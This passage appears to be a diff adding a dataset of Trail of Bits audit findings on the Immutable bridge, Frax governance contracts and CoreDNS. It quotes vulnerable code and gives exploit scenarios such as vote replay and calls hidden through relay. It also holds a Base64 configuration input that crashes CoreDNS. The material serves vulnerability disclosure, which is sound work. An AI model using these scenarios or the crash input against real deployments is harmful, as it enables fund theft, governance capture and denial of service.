immediately withdraws her assets.
Recommendations Short term, determine reasonable lower and upper bounds for the setWithdrawalDelay and setRateControlThreshold functions, and add the necessary validation to those functions. Long term, carefully document which system parameters are configurable and ensure they have adequate upper and lower bound checks.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: High" + ] + }, + { + "title": "3. RootERC20Predicate is incompatible with nonstandard ERC-20 tokens ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-08-immutable-securityreview.pdf", + "body": "The deposit and depositTo functions of the RootERC20Predicate contract are incompatible with nonstandard ERC-20 tokens, such as tokens that take a fee on transfer. The RootERC20Predicate contract allows users to deposit arbitrary tokens into the root chain of the bridge and mint the corresponding token on the child chain of the bridge. Users can deposit their tokens by approving the bridge for the required amount and then calling the deposit or depositTo function of the contract. These functions will call the internal _depositERC20 function, which will perform a check to ensure the token balance of the contract is exactly equal to the balance of the contract before the deposit, plus the amount of tokens that are being deposited. function _depositERC20 (IERC20Metadata rootToken, address receiver , uint256 amount ) private { uint256 expectedBalance = rootToken.balanceOf( address ( this )) + amount; _deposit(rootToken, receiver, amount); // invariant check to ensure that the root token balance has increased by the amount deposited // slither-disable-next-line incorrect-equality require ((rootToken.balanceOf( address ( this )) == expectedBalance), \"RootERC20Predicate: UNEXPECTED_BALANCE\" ); } Figure 3.1: Internal function used to deposit ERC-20 tokens to the bridge (RootERC20Predicate.sol) However, some nonstandard ERC-20 tokens will take a percentage of the transferred amount as a fee. Due to this, the require statement highlighted in figure 3.1 will always fail, preventing users from depositing such tokens. Recommendations Short term, clearly document that nonstandard ERC-20 tokens are not supported by the protocol. If the team determines that they want to support nonstandard ERC-20 implementations, additional logic should be added into the _deposit function to determine the actual token amount received by the contract. In this case, reentrancy protection may be needed to mitigate the risks of ERC-777 and similar tokens that implement callbacks whenever tokens are sent or received. Long term, be aware of the idiosyncrasies of ERC-20 implementations. This standard has a history of misuses and issues. References Incident with non-standard ERC20 deflationary tokens d-xo/weird-erc20", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: Low" + ] + }, + { + "title": "4. Lack of event generation ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-08-immutable-securityreview.pdf", + "body": "Multiple critical operations do not emit events. This creates uncertainty among users interacting with the system. The setRateControlThresholds function in the RootERC20PredicateFlowRate contract does not emit an event when it updates the largeTransferThresholds critical storage variable for a token (figure 4.1).
However, having an event emitted to reflect such a change in the critical storage variable may allow other system and off-chain components to detect suspicious behavior in the system. Events generated during contract execution aid in monitoring, baselining behavior, and detecting suspicious activity. Without events, users and blockchain-monitoring systems cannot easily detect behavior that falls outside the baseline conditions, and malfunctioning contracts and attacks could go undetected.

function setRateControlThreshold(
    address token,
    uint256 capacity,
    uint256 refillRate,
    uint256 largeTransferThreshold
) external onlyRole(RATE_CONTROL_ROLE) {
    _setFlowRateThreshold(token, capacity, refillRate);
    largeTransferThresholds[token] = largeTransferThreshold;
}

Figure 4.1: The setRateControlThreshold function (RootERC20PredicateFlowRate.sol#L214-L222) In addition to the above function, the following function should also emit events: The setAllowedZone function in seaport/contracts/ImmutableSeaport.sol Recommendations Short term, add events for all functions that change state to aid in better monitoring and alerting. Long term, ensure that all state-changing operations are always accompanied by events. In addition, use static analysis tools such as Slither to help prevent such issues in the future.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: Low" + ] + }, + { + "title": "5. Withdrawal queue can be forcibly activated to hinder bridge operation ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-08-immutable-securityreview.pdf", + "body": "The withdrawal queue can be forcibly activated to impede the proper operation of the bridge. The RootERC20PredicateFlowRate contract implements a withdrawal queue to more easily detect and stop large withdrawals from passing through the bridge (e.g., bridging illegitimate funds from an exploit). A transaction can enter the withdrawal queue in four ways: 1. If a token's flow rate has not been configured by the rate control admin 2. If the withdrawal amount is larger than or equal to the large transfer threshold for that token 3. If, during a predefined period, the total withdrawals of that token are larger than the defined token capacity 4. If the rate controller manually activates the withdrawal queue by using the activateWithdrawalQueue function In cases 3 and 4 above, the withdrawal queue becomes active for all tokens, not just the individual transfers. Once the withdrawal queue is active, all withdrawals from the bridge must wait a specified time before the withdrawal can be finalized. As a result, a malicious actor could withdraw a large amount of tokens to forcibly activate the withdrawal queue and hinder the expected operation of the bridge.
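For intuition, the flow-rate mechanism behind cases 2 and 3 behaves like a token bucket. The following is an illustrative model of that logic only, written in Java for exposition; the actual implementation is the Solidity FlowRateDetection contract, and the names here are hypothetical. Withdrawals drain the bucket, the bucket refills at refillRate per second, and draining it activates the global queue.

// Illustrative token-bucket model of the described flow-rate logic.
public class FlowRateBucket {
    long capacity, depth, refillRate, lastRefillSec;

    FlowRateBucket(long capacity, long refillRate) {
        this.capacity = capacity;
        this.depth = capacity;
        this.refillRate = refillRate;
    }

    // Returns true if this withdrawal should activate the withdrawal queue.
    boolean onWithdraw(long amount, long nowSec) {
        depth = Math.min(capacity, depth + (nowSec - lastRefillSec) * refillRate);
        lastRefillSec = nowSec;
        if (amount >= depth) { depth = 0; return true; } // bucket drained
        depth -= amount;
        return false;
    }

    public static void main(String[] args) {
        FlowRateBucket b = new FlowRateBucket(1_000, 10);
        System.out.println(b.onWithdraw(400, 0));  // false: bucket absorbs it
        System.out.println(b.onWithdraw(700, 10)); // true: drains the refilled bucket
    }
}

The model also makes the griefing vector plain: anyone willing to burn amounts near the bucket capacity can keep returning true for every other user.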
Exploit Scenario 1 Eve observes Alice initiating a transfer to bridge her tokens back to the mainnet. Eve also initiates a transfer, or a series of transfers to avoid exceeding the per-transaction limit, of sufficient tokens to exceed the expected flow rate. With Alice unaware she is being targeted for griefing, Eve can execute her withdrawal on the root chain first, cause Alice's withdrawal to be pushed into the withdrawal queue, and activate the queue for every other bridge user. Exploit Scenario 2 Mallory has identified an exploit on the child chain or in the bridge itself, but because of the withdrawal queue, it is not feasible to exfiltrate the funds quickly enough without risking getting caught. Mallory identifies tokens with small flow rate limits relative to their price and repeatedly triggers the withdrawal queue for the bridge, degrading the user experience until Immutable disables the withdrawal queue. Mallory takes advantage of this window of time to carry out her exploit, bridge the funds, and move them into a mixer. Recommendations Short term, explore the feasibility of withdrawal queues on a per-token basis instead of having only a global queue. Be aware that if the flow rates are set low enough, an attacker could feasibly use them to grief all bridge users. Long term, develop processes for regularly reviewing the configuration of the various token buckets. Fluctuating token values may unexpectedly make this type of griefing more feasible. A. Vulnerability Categories The following tables describe the vulnerability categories, severity levels, and difficulty levels used in this document. Vulnerability Categories Category", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: Low" + ] + }, + { + "title": "1. Race condition in FraxGovernorOmega target validation ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-05-fraxgov-securityreview.pdf", + "body": "The FraxGovernorOmega contract is intended for carrying out day-to-day operations and less sensitive proposals that do not adjust system governance parameters. Proposals directly affecting system governance are managed in the FraxGovernorAlpha contract, which has a much higher quorum requirement (40%, compared with FraxGovernorOmega's 4% quorum requirement). When a new proposal is submitted to the FraxGovernorOmega contract through the propose or addTransaction function, the target address of the proposal is checked to prevent proposals from interacting with sensitive functions in allowlisted safes outside of the higher quorum flow (figure 1.1). However, if a proposal to allowlist a new safe is pending in FraxGovernorAlpha, and another proposal that interacts with the pending safe is preemptively submitted through FraxGovernorOmega.propose, the proposal would pass this check, as the new safe would not yet have been added to the allowlist. /// @notice The ```propose``` function is similar to OpenZeppelin's ```propose()``` with minor changes /// @dev Changes include: Forbidding targets that are allowlisted Gnosis Safes /// @return proposalId Proposal ID function propose ( address [] memory targets, uint256 [] memory values, bytes [] memory calldatas, string memory description ) public override returns ( uint256 proposalId ) { _requireSenderAboveProposalThreshold(); for ( uint256 i = 0 ; i < targets.length; ++i) { address target = targets[i]; // Disallow allowlisted safes because Omega would be able to call safe.approveHash() outside of the // addTransaction() / execute() / rejectTransaction() flow if ($safeRequiredSignatures[target] != 0 ) { revert IFraxGovernorOmega.DisallowedTarget(target); } } Figure 1.1: The target validation logic in the FraxGovernorOmega contract's propose function This issue provides a short window of time in which a proposal to update governance parameters that is submitted through FraxGovernorOmega could pass with the contract's 4% quorum, rather than needing to go through FraxGovernorAlpha and its 40% quorum, as intended. Such an exploit would also require cooperation from the safe owners to execute the approved transaction.
As the vast majority of operations in the FraxGovernorOmega process will be optimistic proposals, the community may not monitor the contract as comprehensively as FraxGovernorAlpha, and a minority group of coordinated veFXS holders could take advantage of this loophole. Exploit Scenario A FraxGovernorAlpha proposal to add a new Gnosis Safe to the allowlist is being voted on. In anticipation of the proposal's approval, the new safe owner prepares and signs a transaction on this new safe for a contentious or previously vetoed action. Alice, a veFXS holder, uses FraxGovernorOmega.propose to initiate a proposal to approve the hash of this transaction in the new safe. Alice coordinates with enough other interested veFXS holders to reach the required quorum on the proposal. The proposal passes, and the new safe owner is able to update governance parameters without the consensus of the community. Recommendations Short term, add additional validation to the end of the proposal lifecycle to detect whether the target has become an allowlisted safe. Long term, when designing new functionality, consider how this type of time-of-check to time-of-use mismatch could affect the system.", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: High" + ] + }, + { + "title": "2. Vulnerable project dependency ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-05-fraxgov-securityreview.pdf", + "body": "Although dependency scans did not uncover a direct threat to the project codebase, npm audit identified a dependency with a known vulnerability, the yaml library. Due to the sensitivity of the deployment code and its environment, it is important to ensure that dependencies are not malicious. Problems with dependencies in the JavaScript community could have a significant effect on the project system as a whole. The output detailing the identified issue is provided below: Dependency Version ID", + "labels": [ + "Trail of Bits", + "Severity: Undetermined", + "Difficulty: High" + ] + }, + { + "title": "3. Replay protection missing in castVoteWithReasonAndParamsBySig ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-05-fraxgov-securityreview.pdf", + "body": "The castVoteWithReasonAndParamsBySig function does not include a voter nonce, so transactions involving the function can be replayed by anyone. Votes can be cast through signatures by encoding the vote counts in the params argument.

function castVoteWithReasonAndParamsBySig(
    uint256 proposalId,
    uint8 support,
    string calldata reason,
    bytes memory params,
    uint8 v,
    bytes32 r,
    bytes32 s
) public virtual override returns (uint256) {
    address voter = ECDSA.recover(
        _hashTypedDataV4(
            keccak256(
                abi.encode(
                    EXTENDED_BALLOT_TYPEHASH,
                    proposalId,
                    support,
                    keccak256(bytes(reason)),
                    keccak256(params)
                )
            )
        ),
        v, r, s
    );
    return _castVote(proposalId, voter, support, reason, params);
}

Figure 3.1: The castVoteWithReasonAndParamsBySig function does not include a nonce. (Governor.sol#L508-L535) The castVoteWithReasonAndParamsBySig function calls the _countVoteFractional function in the GovernorCountingFractional contract, which keeps track of partial votes. Unlike _countVoteNominal, _countVoteFractional can be called multiple times, as long as the voter's total voting weight is not exceeded.
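The standard fix is a nonce-consumption pattern: bind a per-voter nonce into the signed payload and consume it on use. For exposition only, here is a language-agnostic sketch of that pattern in Java; the real fix would live in the Solidity contract and would bind the nonce into the EIP-712 digest shown in figure 3.1.

import java.util.HashMap;
import java.util.Map;

// Illustrative nonce-based replay guard (hypothetical, not the contract code).
public class ReplayGuard {
    final Map<String, Long> nonces = new HashMap<>();

    // The payload the voter signs must include their current nonce.
    long expectedNonce(String voter) { return nonces.getOrDefault(voter, 0L); }

    void castBySig(String voter, long signedNonce) {
        if (signedNonce != expectedNonce(voter))
            throw new IllegalStateException("Replayed or stale signature");
        nonces.put(voter, signedNonce + 1); // consume the nonce
    }

    public static void main(String[] args) {
        ReplayGuard g = new ReplayGuard();
        g.castBySig("alice", 0); // accepted
        try {
            g.castBySig("alice", 0); // identical message
        } catch (IllegalStateException e) {
            System.out.println(e.getMessage()); // rejected: replay
        }
    }
}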
Exploit Scenario Alice has 100,000 voting power. She signs a message, and a relayer calls castVoteWithReasonAndParamsBySig to vote for one yes and one abstain. Eve sees this transaction on-chain and replays it for the remainder of Alice's voting power, casting votes that Alice did not intend to cast. Recommendations Short term, either include a voter nonce for replay protection or modify the _countVoteFractional function to require that _proposalVotersWeightCast[proposalId][account] equals 0, which would allow votes to be cast only once. Long term, increase the test coverage to include cases of signature replay.", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: Medium" + ] + }, + { + "title": "4. Ability to lock any user's tokens using deposit_for ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-05-fraxgov-securityreview.pdf", + "body": "The deposit_for function can be used to lock anyone's tokens given sufficient token approvals and an existing lock.

@external
@nonreentrant('lock')
def deposit_for(_addr: address, _value: uint256):
    """
    @notice Deposit `_value` tokens for `_addr` and add to the lock
    @dev Anyone (even a smart contract) can deposit for someone else, but cannot extend their locktime and deposit for a brand new user
    @param _addr User's wallet address
    @param _value Amount to add to user's lock
    """
    _locked: LockedBalance = self.locked[_addr]
    assert _value > 0  # dev: need non-zero value
    assert _locked.amount > 0, "No existing lock found"
    assert _locked.end > block.timestamp, "Cannot add to expired lock. Withdraw"
    self._deposit_for(_addr, _value, 0, self.locked[_addr], DEPOSIT_FOR_TYPE)

Figure 4.1: The deposit_for function can be used to lock anyone's tokens. (test/veFXS.vy#L458-L474) The same issue is present in the veCRV contract for the CRV token, so it may be known or intentional. Exploit Scenario Alice gives unlimited FXS token approval to the veFXS contract. Alice wants to lock 1 FXS for 4 years. Bob sees that Alice has 100,000 FXS and locks all of the tokens for her. Alice is no longer able to access her 100,000 FXS. Recommendations Short term, make users aware of the issue in the existing token contract. Only present the user with exact approval limits when locking FXS.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: Low" + ] + }, + { + "title": "5. The relay function can be used to call critical safe functions ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-05-fraxgov-securityreview.pdf", + "body": "The relay function of the FraxGovernorOmega contract supports arbitrary calls to arbitrary targets and can be leveraged in a proposal to call sensitive functions on the Gnosis Safe.

function relay(address target, uint256 value, bytes calldata data) external payable virtual onlyGovernance {
    (bool success, bytes memory returndata) = target.call{value: value}(data);
    Address.verifyCallResult(success, returndata, "Governor: relay reverted without message");
}

Figure 5.1: The relay function inherited from Governor.sol The FraxGovernorOmega contract checks proposed transactions to ensure they do not target critical functions on the Gnosis Safe contract outside of the more restrictive FraxGovernorAlpha flow.
function propose ( address [] memory targets, uint256 [] memory values, bytes [] memory calldatas, string memory description ) public override returns ( uint256 proposalId ) { _requireSenderAboveProposalThreshold(); for ( uint256 i = 0 ; i < targets.length; ++i) { address target = targets[i]; // Disallow allowlisted safes because Omega would be able to call safe.approveHash() outside of the // addTransaction() / execute() / rejectTransaction() flow if ($safeRequiredSignatures[target] != 0 ) { revert IFraxGovernorOmega.DisallowedTarget(target); } } proposalId = _propose({ targets: targets, values: values, calldatas: calldatas, description: description }); } Figure 5.2: The propose function of FraxGovernorOmega.sol A malicious user can hide a call to the Gnosis Safe by wrapping it in a call to the relay function. There are no further restrictions on the target contract argument, which means the relay function can be called with calldata that targets the Gnosis Safe contract. Exploit Scenario Alice, a veFXS holder, submits a transaction to the propose function. The targets array contains the FraxGovernorOmega address, and the corresponding calldatas array contains an encoded call to its relay function. The encoded call to the relay function has a target address of an allowlisted Gnosis Safe and an encoded call to its approveHash function with a payload of a malicious transaction hash. Due to the low quorum threshold on FraxGovernorOmega and the shorter voting period, Alice is able to push her malicious transaction through, and it is approved by the safe even though it should not have been. Recommendations Short term, add a check to the relay function that prevents it from targeting addresses of allowlisted safes. Long term, carefully examine all cases of user-provided inputs, especially where arbitrary targets and calldata can be submitted, and expand the unit tests to account for edge cases specific to the wider system.", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: Medium" + ] + }, + { + "title": "6. Votes can be delegated to contracts ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-05-fraxgov-securityreview.pdf", + "body": "Votes can be delegated to smart contracts. This behavior contrasts with the fact that FXS tokens can be locked only in whitelisted contracts. Allowing votes to be delegated to smart contracts could lead to unexpected behavior. By default, smart contracts are unable to gain voting power; to gain voting power, they need to be explicitly whitelisted by the Frax Finance team in the veFXS contract.

@internal
def assert_not_contract(addr: address):
    """
    @notice Check if the call is from a whitelisted smart contract, revert if not
    @param addr Address to be checked
    """
    if addr != tx.origin:
        checker: address = self.smart_wallet_checker
        if checker != ZERO_ADDRESS:
            if SmartWalletChecker(checker).check(addr):
                return
        raise "Smart contract depositors not allowed"

Figure 6.1: The contract check in veFXS.vy This is the intended design of the voting escrow contract, as allowing smart contracts to vote would enable wrapped tokens and bribes. The VeFxsVotingDelegation contract enables users to delegate their voting power to other addresses, but it does not contain a check for smart contracts. This means that smart contracts can now hold voting power, and the team is unable to disallow this.
function _delegate ( address delegator , address delegatee ) internal { // Revert if delegating to self with address(0), should be address(delegator) if (delegatee == address ( 0 )) revert IVeFxsVotingDelegation.IncorrectSelfDelegation(); IVeFxsVotingDelegation.Delegation memory previousDelegation = $delegations[delegator]; // This ensures that checkpoints take effect at the next epoch uint256 checkpointTimestamp = (( block.timestamp / 1 days) * 1 days) + 1 days; IVeFxsVotingDelegation.NormalizedVeFxsLockInfo memory normalizedDelegatorVeFxsLockInfo = _getNormalizedVeFxsLockInfo({ delegator: delegator, checkpointTimestamp: checkpointTimestamp }); _moveVotingPowerFromPreviousDelegate({ previousDelegation: previousDelegation, checkpointTimestamp: checkpointTimestamp }); _moveVotingPowerToNewDelegate({ newDelegate: delegatee, delegatorVeFxsLockInfo: normalizedDelegatorVeFxsLockInfo, checkpointTimestamp: checkpointTimestamp }); // ... } Figure 6.2: The _delegate function in VeFxsVotingDelegation.sol Exploit Scenario Eve sets up a contract that accepts delegated votes in exchange for rewards. The contract ends up owning a majority of the FXS voting power. Recommendations Short term, consider whether smart contracts should be allowed to hold voting power. If so, document this fact; if not, add a check to the VeFxsVotingDelegation contract to ensure that addresses receiving delegated voting power are not smart contracts. Long term, when implementing new features, consider the implications of adding them to ensure that they do not lift constraints that were placed beforehand.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: Low" + ] + }, + { + "title": "7. Lack of public documentation regarding voting power expiry ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-05-fraxgov-securityreview.pdf", + "body": "The user documentation concerning the calculation of voting power is unclear. The Frax-Governance specification sheet provided by the Frax Finance team states, Voting power goes to 0 at veFXS lock expiration time, this is different from veFXS.getBalance() which will return the locked amount of FXS after the lock has expired. This statement is in line with the code's behavior. The _calculateVotingWeight function in the VeFxsVotingDelegation contract does not return the locked veFXS balance once a lock has expired. /// @notice The ```_calculateVotingWeight``` function calculates ```account```'s voting weight. Is 0 if they ever delegated and the delegation is in effect. /// @param voter Address of voter /// @param timestamp A block.timestamp, typically corresponding to a proposal snapshot /// @return votingWeight Voting weight corresponding to ```account```'s veFXS balance function _calculateVotingWeight ( address voter , uint256 timestamp ) internal view returns ( uint256 ) { // If lock is expired they have no voting weight if (VE_FXS.locked(voter).end <= timestamp) return 0 ; uint256 firstDelegationTimestamp = $delegations[voter].firstDelegationTimestamp; // Never delegated OR this timestamp is before the first delegation by account if (firstDelegationTimestamp == 0 || timestamp < firstDelegationTimestamp) { try VE_FXS.balanceOf({ addr: voter, _t: timestamp }) returns ( uint256 _balance ) { return _balance; } catch {} } return 0 ; } Figure 7.2: The function that calculates the voting weight in VeFxsVotingDelegation.sol If a voter's lock has expired or was never created, the short-circuit condition returns zero voting power.
This behavior contrasts with the veFxs.balanceOf function, which would return the user's last locked FXS balance.

@external
@view
def balanceOf(addr: address, _t: uint256 = block.timestamp) -> uint256:
    """
    @notice Get the current voting power for `msg.sender`
    @dev Adheres to the ERC20 `balanceOf` interface for Aragon compatibility
    @param addr User wallet address
    @param _t Epoch time to return voting power at
    @return User voting power
    """
    _epoch: uint256 = self.user_point_epoch[addr]
    if _epoch == 0:
        return 0
    else:
        last_point: Point = self.user_point_history[addr][_epoch]
        last_point.bias -= last_point.slope * convert(_t - last_point.ts, int128)
        if last_point.bias < 0:
            last_point.bias = 0
        unweighted_supply: uint256 = convert(last_point.bias, uint256)  # Original from veCRV
        weighted_supply: uint256 = last_point.fxs_amt + (VOTE_WEIGHT_MULTIPLIER * unweighted_supply)
        return weighted_supply

Figure 7.1: The balanceOf function in veFXS.vy This divergence should be clearly documented in the code and should be reflected in Frax Finance's public-facing documentation, which does not mention the fact that an expired lock does not hold any voting power: Each veFXS has 1 vote in governance proposals. Staking 1 FXS for the maximum time, 4 years, would generate 4 veFXS. This veFXS balance itself will slowly decay down to 1 veFXS after 4 years, [...]. Exploit Scenario Alice buys FXS to be able to vote on a proposal. She is not aware that she is required to create a lock (even if expired) to have any voting power at all. She is unable to vote for the proposal. Recommendations Short term, modify the VeFxsVotingDelegation contract to reflect the desired voting power curve and/or document whether this is intended behavior. Long term, make sure to keep public-facing documentation up to date when changes are made.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: Low" + ] + }, + { + "title": "8. Spamming risk in propose functions ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-05-fraxgov-securityreview.pdf", + "body": "Anyone with enough veFXS tokens to meet the proposal threshold can submit an unbounded number of proposals to both the FraxGovernorAlpha and FraxGovernorOmega contracts. The only requirement for submitting proposals is that the msg.sender address must have a balance of veFXS tokens larger than the _proposalThreshold value. Once that requirement is met, a user can submit as many proposals as they would like. A large volume of proposals may create difficulties for off-chain monitoring solutions and user-interface interactions.

function _requireSenderAboveProposalThreshold() internal view {
    if (_getVotes(msg.sender, block.timestamp - 1, "") < proposalThreshold()) {
        revert SenderVotingWeightBelowProposalThreshold();
    }
}

Figure 8.1: The _requireSenderAboveProposalThreshold function, called by the propose function (FraxGovernorBase.sol#L104-L108) Exploit Scenario Mallory has 100,000 voting power. She submits one million proposals with small but unique changes to the description field of each one. The system saves one million unique proposals and emits one million ProposalCreated events. Front-end components and off-chain monitoring systems are spammed with large quantities of data. Recommendations Short term, track and limit the number of proposals a user can have active at any given time. Long term, consider cases of user interactions beyond just the intended use cases for potential malicious behavior. A.
Vulnerability Categories The following tables describe the vulnerability categories, severity levels, and difficulty levels used in this document. Vulnerability Categories Category", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: Low" + ] + }, + { + "title": "1. Risk of a race condition in the secondary plugin's setup function ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/CoreDNS.pdf", + "body": "When it fails to transfer a zone from another server, the setup function of the secondary plugin prints a message to standard output. It obtains the name of the zone, stored in the variable n , from a loop and prints the message in an anonymous inner goroutine. However, the variable is not copied before being used in the anonymous goroutine, and the value that n points to is likely to change by the time the scheduler executes the goroutine. Consequently, the value of n will be inaccurate when it is printed. func setup(c *caddy.Controller) error { // (...) for _, n := range zones.Names { // (...) c.OnStartup( func () error { z.StartupOnce.Do( func () { go func () { // (...) for { // (...) log.Warningf( \"All '%s' masters failed to transfer, retrying in %s: %s\" , n , dur.String(), err) // (...) } } } z.Update() }() }) return nil }) Figure 1.1: The value of n is not copied before it is used in the anonymous goroutine and could be logged incorrectly. ( plugin/secondary/setup.go#L19-L53 ) Exploit Scenario An operator of a CoreDNS server enables the secondary plugin. The operator sees an error in the standard output indicating that the zone transfer failed. However, the error points to an invalid zone, making it more difficult for the operator to troubleshoot and fix the issue. Recommendations Short term, create a copy of n before it is used in the anonymous goroutine. See Appendix B for a proof of concept demonstrating this issue and an example of the fix. Long term, integrate the anonymous-race-condition Semgrep rule into the CI/CD pipeline to catch this type of race condition.", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: Undetermined" + ] + }, + { + "title": "2. Upstream errors captured in the grpc plugin are not returned ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/CoreDNS.pdf", + "body": "In the ServeDNS implementation of the grpc plugin, upstream errors are captured in a loop. However, once an error is captured in the upstreamErr variable, the function exits with a nil error; this is because there is no break statement forcing the function to exit the loop and to reach a return statement, at which point it would return the error value. The ServeDNS function of the forward plugin includes a similar but correct implementation. func (g *GRPC) ServeDNS(ctx context.Context, w dns.ResponseWriter, r *dns.Msg) ( int , error ) { // (...) upstreamErr = err // Check if the reply is correct; if not return FormErr. if !state.Match(ret) { debug.Hexdumpf(ret, \"Wrong reply for id: %d, %s %d\" , ret.Id, state.QName(), state.QType()) formerr := new (dns.Msg) formerr.SetRcode(state.Req, dns.RcodeFormatError) w.WriteMsg(formerr) return 0 , nil } w.WriteMsg(ret) return 0 , nil } if upstreamErr != nil { return dns.RcodeServerFailure, upstreamErr } Figure 2.1: The ServeDNS implementation of the grpc plugin Exploit Scenario An operator runs CoreDNS with the grpc plugin. Upstream errors cause the gRPC functionality to fail.
However, because the errors are not logged, the operator remains unaware of their root cause and has difficulty troubleshooting and remediating the issue. Recommendations Short term, correct the ineffectual assignment to ensure that errors captured by the plugin are returned. Long term, integrate ineffassign into the CI/CD pipeline to catch this and similar issues.", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: Undetermined" + ] + }, + { + "title": "3. Index-out-of-range panic in autopath plugin initialization ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/CoreDNS.pdf", + "body": "The following syntax is used to configure the autopath plugin: autopath [ZONE...] RESOLV-CONF The RESOLV-CONF parameter can point to a resolv.conf(5) configuration file or to another plugin, if the string in the resolv variable is prefixed with an @ symbol (e.g., @kubernetes). However, the autoPathParse function does not ensure that the length of the RESOLV-CONF parameter is greater than zero before dereferencing its first element and comparing it with the @ character. func autoPathParse(c *caddy.Controller) (*AutoPath, string , error ) { ap := &AutoPath{} mw := \"\" for c.Next() { zoneAndresolv := c.RemainingArgs() if len (zoneAndresolv) < 1 { return ap, \"\" , fmt.Errorf( \"no resolv-conf specified\" ) } resolv := zoneAndresolv[ len (zoneAndresolv)- 1 ] if resolv[ 0 ] == '@' { mw = resolv[ 1 :] Figure 3.1: The length of resolv may be zero when the first element is checked. ( plugin/autopath/setup.go#L45-L54 ) Specifying a configuration file with a zero-length RESOLV-CONF parameter, as shown in figure 3.2, would cause CoreDNS to panic. autopath \"\" Figure 3.2: An autopath configuration with a zero-length RESOLV-CONF parameter panic: runtime error: index out of range [0] with length 0 goroutine 1 [running]: github.com/coredns/coredns/plugin/autopath.autoPathParse(0xc000518870) /home/ubuntu/audit-coredns/client-code/coredns/plugin/autopath/setup.go:53 +0x35c github.com/coredns/coredns/plugin/autopath.setup(0xc000518870) /home/ubuntu/audit-coredns/client-code/coredns/plugin/autopath/setup.go:16 +0x33 github.com/coredns/caddy.executeDirectives(0xc00029eb00, {0x7ffdc770671b, 0x8}, {0x324cfa0, 0x31, 0x1000000004b7e06}, {0xc000543260, 0x1, 0x8}, 0x0) /home/ubuntu/go/pkg/mod/github.com/coredns/caddy@v1.1.1/caddy.go:661 +0x5f6 github.com/coredns/caddy.ValidateAndExecuteDirectives({0x22394b8, 0xc0003e8a00}, 0xc0003e8a00, 0x0) /home/ubuntu/go/pkg/mod/github.com/coredns/caddy@v1.1.1/caddy.go:612 +0x3e5 github.com/coredns/caddy.startWithListenerFds({0x22394b8, 0xc0003e8a00}, 0xc00029eb00, 0x0) /home/ubuntu/go/pkg/mod/github.com/coredns/caddy@v1.1.1/caddy.go:515 +0x274 github.com/coredns/caddy.Start({0x22394b8, 0xc0003e8a00}) /home/ubuntu/go/pkg/mod/github.com/coredns/caddy@v1.1.1/caddy.go:472 +0xe5 github.com/coredns/coredns/coremain.Run() /home/ubuntu/audit-coredns/client-code/coredns/coremain/run.go:62 +0x1cd main.main() /home/ubuntu/audit-coredns/client-code/coredns/coredns.go:12 +0x17 Figure 3.3: CoreDNS panics when loading the autopath configuration. Exploit Scenario An operator of a CoreDNS server provides an empty RESOLV-CONF parameter when configuring the autopath plugin, causing a panic. Because CoreDNS does not provide a clear explanation of what went wrong, it is difficult for the operator to troubleshoot and fix the issue. Recommendations Short term, verify that the resolv variable is a non-empty string before indexing it.
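As an illustration, a guard of the following shape in autoPathParse would reject an empty argument before it is indexed; this is a sketch based on the names in figure 3.1, not a tested patch:
resolv := zoneAndresolv[len(zoneAndresolv)-1]
// Reject an empty RESOLV-CONF argument instead of panicking on resolv[0].
if len(resolv) == 0 {
    return ap, \"\", fmt.Errorf(\"empty resolv-conf specified\")
}
if resolv[0] == '@' {
    mw = resolv[1:]
}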
Long term, review the codebase for instances in which data is indexed without undergoing a length check; handling untrusted data in this way may lead to a more severe denial of service (DoS).", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: Undetermined" + ] + }, + { + "title": "4. Index-out-of-range panic in forward plugin initialization ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/CoreDNS.pdf", + "body": "Initializing the forward plugin involves parsing the relevant configuration section. func parseStanza(c *caddy.Controller) (*Forward, error ) { f := New() if !c.Args(&f.from) { return f, c.ArgErr() } origFrom := f.from zones := plugin.Host(f.from).NormalizeExact() f.from = zones[ 0 ] // there can only be one here, won't work with non-octet reverse Figure 4.1: The length of the zones variable may be zero when the first element is checked. ( plugin/forward/setup.go#L89-L97 ) An invalid configuration file for the forward plugin could cause the zones variable to have a length of zero. A Base64-encoded example of such a configuration file is shown in figure 4.2. Lgpmb3J3YXJkIE5vTWF0Pk69VL0vvVN0ZXJhbENoYXJDbGFzc0FueUNoYXJOb3ROTEEniez6bnlDaGFyQmVnaW5MaW5l RW5kTGluZUJlZ2luVGV4dEVuZFRleHRXb3JkQm91bmRhcnlOb1dvYXRpbmcgc3lzdGVtIDogImV4dCIsICJ4ZnMiLCAi bnRTaW50NjRLaW5kZnMiLiB5IGluZmVycmVkIHRvIGJlIGV4dCBpZiB1bnNwZWNpZmllZCBlIDogaHR0cHM6Di9rdWJl 